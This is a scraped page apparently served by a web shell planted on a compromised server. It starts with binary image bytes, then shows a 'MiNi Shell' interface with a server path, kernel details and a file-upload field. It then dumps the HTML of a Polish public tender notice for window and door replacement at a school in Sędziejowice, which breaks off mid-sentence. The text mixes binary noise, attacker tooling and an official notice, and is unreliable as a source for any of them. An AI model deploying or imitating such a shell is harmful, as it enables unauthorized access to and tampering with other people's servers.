JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240807/0044929401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana stolarki okiennej i drzwiowej zewnętrznej w budynkach I i II w ramach termomodernizacji budynków Zespołu Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000095615</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolonia 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice-Kolonia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43 677 10 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zsckrsedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsrgrabski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana stolarki okiennej i drzwiowej zewnętrznej w budynkach I i II w ramach termomodernizacji budynków Zespołu Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e214bf19-6f83-4793-931f-0cfe233a70e2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00449294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00278117/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Wymiana stolarki okiennej i drzwiowej zewnętrznej w budynkach I i II w ramach termomodernizacji budynków Zespołu Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e214bf19-6f83-4793-931f-0cfe233a70e2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-e214bf19-6f83-4793-931f-0cfe233a70e2</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert, które należy złożyć elektronicznie, w sposób opisany w cz. XVI SWZ, odbywa się drogą elektroniczną<br/>za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w<br/>sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia.<br/>Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej, za pośrednictwem platformy e-Zamówienia –<br/>https://ezamowienia.gov.pl/. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania lub numerem ogłoszenia z BZP.<br/>Na platformie e-Zamówienia https://ezamowienia.gov.pl/założona jest odrębna strona przeznaczona dla niniejszego postępowania i<br/>w jej ramach udostępnione są dokumenty postępowania, narzędzia do komunikacji z Zamawiającym oraz narzędzia służące<br/>złożeniu/wycofaniu oferty.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformie<br/>https://ezamowienia.gov.pl/ przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie<br/>może trafić do folderu SPAM.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl. oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Zamawiający dopuszcza, w wyjątkowych przypadkach, komunikację z Wykonawcami za pomocą poczty elektronicznej, e-mail:<br/>przetargi@zsckrsedziejowice.pl<br/>Pełna informacja w zakresie komunikacji elektronicznej znajduje się w cz. XV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119<br/>z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>- Administratorem danych osobowych Wykonawcy jest - Dyrektor Zespołu Szkół<br/>Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach,<br/>Sędziejowice - Kolonia 10, 98 - 160 Sędziejowice. Inspektorem danych osobowych jest<br/>Pan Michał Bartela. Telefon do szkoły - 43 677 10 04. Adres email: sekretariat@zsckrsedziejowice.pl<br/>- Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego<br/>oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny<br/>stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający<br/>na Zamawiającym – w oparciu o przepisy ustawy Prawo zamówień publicznych oraz<br/>aktów wykonawczych do Pzp.<br/>- Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp.<br/>- Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Obowiązek<br/>podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem<br/>ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>Pzp.<br/>- Państwa dane osobowe nie będą przetwarzane w sposób zautomatyzowany oraz<br/>nie będą podlegały profilowaniu, stosowanie do art. 22 RODO.<br/>- Do Państwa danych osobowych mogą mieć dostęp, wyłącznie na podstawie zawartych<br/>umów powierzenia przetwarzania, podmioty zewnętrzne realizujące usługi na rzecz<br/>zamawiającego, nadto podmioty korzystające z Biuletynu Informacji Publicznej, Biuletynu<br/>Zamówień Publicznych, systemu E-zamówienia, Bazy konkurencyjności oraz internetowej<br/>platformy zakupowej e-Katalogi, będącej w gestii Urzędu Zamówień Publicznych.<br/>- W związku z przetwarzaniem Państwa danych osobowych jesteście Państwo<br/>uprawnieni do:<br/>a)dostępu do swoich danych osobowych – na podstawie art. 15 RODO,<br/>b)sprostowania lub uzupełnienia swoich danych osobowych – na podstawie art. 16 RODO,<br/>przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>33<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>c) żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia,<br/>d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają<br/>Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy<br/>RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Państwu obowiązku<br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane<br/>przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba<br/>że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR.07.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na<br/>wymianie i montażu stolarki otworowej zewnętrznej (okiennej i drzwiowej)<br/>oraz prac towarzyszących. Zakres dotyczy Budynków szkoły określonych jako I<br/>i II Zespołu Szkół Centrum Kształcenia Rolniczego im. Władysława<br/>Grabskiego w Sędziejowicach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający zastosuje następujące<br/>kryteria oceny ofert, przypisując im odpowiednią wagę punktową zakładając, że w zakresie<br/>każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium = 1 punkt. 2. Zasady oceny ofert wg kryterium „ Cena brutto ” (C):<br/>1) W przypadku kryterium „Cena brutto&#34; oferta otrzyma zaokrągloną do dwóch miejsc po<br/>przecinku ilość punktów wynikającą z działania:<br/>CN<br/>C = ----------------------------------- x 60 pkt<br/>COB<br/>a) Maksymalna liczba punktów jaką może uzyskać oferta w kryterium oceny ofert jakim<br/>jest „Cena brutto” wynosi – 60 pkt.<br/>b) Zgodnie z art. 225 pkt 1 Pzp, w przypadku, gdy wybór oferty prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od<br/>towarów i usług, do ceny najkorzystniejszej oferty lub oferty z najniższą ceną zostanie<br/>odpowiednio doliczony podatek VAT, który Zamawiający miałby obowiązek rozliczyć<br/>zgodnie z tymi przepisami.<br/>3. Zasady oceny ofert wg kryterium „Długość okresu gwarancji” (D) :<br/>a) Wykonawca zobowiązany jest udzielić co najmniej 36 miesięcznej gwarancji na całość<br/>przedmiotu zamówienia. Zamawiający przyzna punkty, jeśli Wykonawca wydłuży okres<br/>gwarancji do 48 miesięcy lub 60 miesięcy. 4. Końcowa ocena ofert<br/>a) Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze<br/>wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie<br/>do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest<br/>mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5<br/>wynik zostanie zaokrąglony w górę.<br/>b) Sposób wyznaczenia końcowej oceny oferty nastąpi wg wzoru:<br/>Ko = C + D. c) Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach:<br/>(1 % = 1 pkt.)<br/>d) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, przy wykorzystaniu matematycznych zasad<br/>zaokrąglania; najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>e) Zamawiający udzieli zamówienia temu (tym) Wykonawcy (Wykonawcom), którego(ych)<br/>oferta zostanie uznana za najkorzystniejszą, tj. uzyska największą łączną ilość punktów ze<br/>wszystkich kryteriów.<br/>f) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawiają taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert,<br/>Zamawiający:<br/>- spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.<br/>- jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze,<br/>Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>g) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej w pkt f) ,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>29<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt,<br/>przy czym, Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen lub kosztów<br/>wyższych niż zaoferowane w uprzednio złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>na zasadach określonych w cz. VII SWZ, oraz spełniają warunki udziału w postępowaniu,<br/>określone na podstawie art. 112 Pzp dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>13<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>minimum 1.000.000,00 zł.<br/>- Jeżeli w trakcie realizacji umowy polisa straci ważność, Wykonawca jest zobowiązany<br/>do przedłożenia kserokopii nowej polisy poświadczonej za zgodność z oryginałem.<br/>- Wartości podane w dokumentach w walutach innych niż wskazane przez<br/>Zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia<br/>dokumentu.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże (Załącznik Nr 3 do SWZ), że<br/>zrealizował należycie/zakończył, w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co<br/>najmniej 1 robotę budowlaną (o wartości minimum 400.000,00 zł) odpowiadającą<br/>swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia,<br/>polegających na wykonywaniu prac związanych z montażem stolarki okiennej i<br/>drzwiowej zewnętrznej.<br/>b) Warunek dotyczący osób skierowanych przez Wykonawcę do realizacji zamówienia.<br/>Wykonawca spełni warunek, jeżeli wykaże (Załącznik Nr 4 do SWZ), że dysponuje<br/>i skieruje do realizacji zamówienia co najmniej 1 osobę<br/>z uprawnieniami zawodowymi do wykonywania samodzielnych funkcji<br/>w budownictwie, w tym:<br/>- jedną 